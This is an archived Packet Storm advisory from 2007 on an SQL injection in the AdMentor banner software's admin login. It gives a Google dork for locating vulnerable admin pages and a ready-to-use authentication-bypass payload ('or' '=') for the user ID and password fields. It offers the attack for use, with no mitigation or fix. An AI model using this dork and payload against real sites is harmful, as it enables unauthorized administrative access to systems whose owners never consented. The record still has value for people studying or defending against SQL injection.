admentor-sql.txt

2007-01-29T00:00:00
ID PACKETSTORM:54066
Type packetstorm
Reporter sn0oPy
Modified 2007-01-29T00:00:00

Description

                                        
                                            `* AdMentor (banners) admin SQL injection  
  
* By : sn0oPy  
  
* Risk : high  
  
* Site : http://www.aspcode.net/products/admentor  
  
* Dork : inurl:"admentor/admin"  
  
* exploit :  
  
UserID = 'or' '='  
  
Password = 'or' '='  
  
  
* contact : sn0oPy.team@gmail.com  
  
* greetz : [subzero], Avg Team(http://forums.avenir-geopolitique.net).  
  
references : http://forums.avenir-geopolitique.net/viewtopic.php?t=2606  
`